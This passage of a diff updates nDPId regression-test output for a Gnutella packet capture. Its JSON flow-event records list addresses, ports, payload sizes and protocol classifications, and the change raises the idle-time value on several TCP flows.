00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":796,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":551892,"flow_last_seen":551892,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"41.249.63.200","src_port":28681,"dst_port":22582,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00580{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":787,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":493287,"flow_last_seen":493287,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"220.133.122.217","src_port":28681,"dst_port":23458,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00565{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":787,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":493287,"flow_last_seen":493287,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"220.133.122.217","src_port":28681,"dst_port":23458,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":86641,"flow_last_seen":95653,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.252.91.201","src_port":50279,"dst_port":4297,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":86641,"flow_last_seen":95653,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.252.91.201","src_port":50279,"dst_port":4297,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":86641,"flow_last_seen":95653,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.252.91.201","src_port":50279,"dst_port":4297,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":86641,"flow_last_seen":95653,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.252.91.201","src_port":50279,"dst_port":4297,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00579{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":71540,"flow_last_seen":551891,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"200.120.243.143","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00564{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":71540,"flow_last_seen":551891,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"200.120.243.143","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00579{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":793,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":493288,"flow_last_seen":493288,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"123.205.126.102","src_port":28681,"dst_port":5193,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} @@ -4002,69 +4002,69 @@ 00575{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":749,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":312956,"flow_last_seen":493285,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"92.8.59.80","src_port":28681,"dst_port":35192,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00560{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":749,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":312956,"flow_last_seen":493285,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"92.8.59.80","src_port":28681,"dst_port":35192,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00641{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":801,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":599426,"flow_last_seen":599747,"flow_idle_time":120000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} -00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":72267,"flow_last_seen":81278,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.78.134.188","src_port":50254,"dst_port":49046,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":72267,"flow_last_seen":81278,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.78.134.188","src_port":50254,"dst_port":49046,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":72267,"flow_last_seen":81278,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.78.134.188","src_port":50254,"dst_port":49046,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":72267,"flow_last_seen":81278,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.78.134.188","src_port":50254,"dst_port":49046,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":799,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":599415,"flow_last_seen":599529,"flow_idle_time":180000,"flow_min_l4_payload_len":772,"flow_max_l4_payload_len":772,"flow_tot_l4_payload_len":1544,"flow_avg_l4_payload_len":772,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::c","src_port":63958,"dst_port":3702,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} -00917{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":333,"flow_state":"finished","flow_packets_processed":2356,"flow_first_seen":114930,"flow_last_seen":546895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2191780,"flow_avg_l4_payload_len":930,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"69.118.162.229","src_port":50327,"dst_port":46906,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":67094,"flow_last_seen":76122,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"118.167.248.220","src_port":50223,"dst_port":63108,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00559{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":67094,"flow_last_seen":76122,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"118.167.248.220","src_port":50223,"dst_port":63108,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":66078,"flow_last_seen":75077,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"90.103.247.94","src_port":50218,"dst_port":59045,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00557{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":66078,"flow_last_seen":75077,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"90.103.247.94","src_port":50218,"dst_port":59045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00917{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":333,"flow_state":"finished","flow_packets_processed":2356,"flow_first_seen":114930,"flow_last_seen":546895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2191780,"flow_avg_l4_payload_len":930,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"69.118.162.229","src_port":50327,"dst_port":46906,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":67094,"flow_last_seen":76122,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"118.167.248.220","src_port":50223,"dst_port":63108,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00559{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":67094,"flow_last_seen":76122,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"118.167.248.220","src_port":50223,"dst_port":63108,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":66078,"flow_last_seen":75077,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"90.103.247.94","src_port":50218,"dst_port":59045,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00557{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":66078,"flow_last_seen":75077,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"90.103.247.94","src_port":50218,"dst_port":59045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":71540,"flow_last_seen":551891,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"90.65.141.157","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":71540,"flow_last_seen":551891,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"90.65.141.157","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":65061,"flow_last_seen":74093,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.252.206.254","src_port":50209,"dst_port":49587,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00559{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":65061,"flow_last_seen":74093,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.252.206.254","src_port":50209,"dst_port":49587,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00570{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":67094,"flow_last_seen":76122,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"78.125.63.97","src_port":50224,"dst_port":6346,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00555{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":67094,"flow_last_seen":76122,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"78.125.63.97","src_port":50224,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":65061,"flow_last_seen":74093,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.252.206.254","src_port":50209,"dst_port":49587,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00559{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":65061,"flow_last_seen":74093,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.252.206.254","src_port":50209,"dst_port":49587,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00570{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":67094,"flow_last_seen":76122,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"78.125.63.97","src_port":50224,"dst_port":6346,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00555{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":67094,"flow_last_seen":76122,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"78.125.63.97","src_port":50224,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00576{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":82062,"flow_last_seen":551890,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"92.88.92.56","src_port":28681,"dst_port":21009,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00561{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":82062,"flow_last_seen":551890,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"92.88.92.56","src_port":28681,"dst_port":21009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00579{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":82063,"flow_last_seen":551890,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"165.169.195.227","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00564{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":82063,"flow_last_seen":551890,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"165.169.195.227","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00579{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":72853,"flow_last_seen":553213,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"165.169.226.142","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00564{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":72853,"flow_last_seen":553213,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"165.169.226.142","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":68108,"flow_last_seen":77122,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"111.246.157.94","src_port":50227,"dst_port":51175,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":68108,"flow_last_seen":77122,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"111.246.157.94","src_port":50227,"dst_port":51175,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":68108,"flow_last_seen":77122,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"111.246.157.94","src_port":50227,"dst_port":51175,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 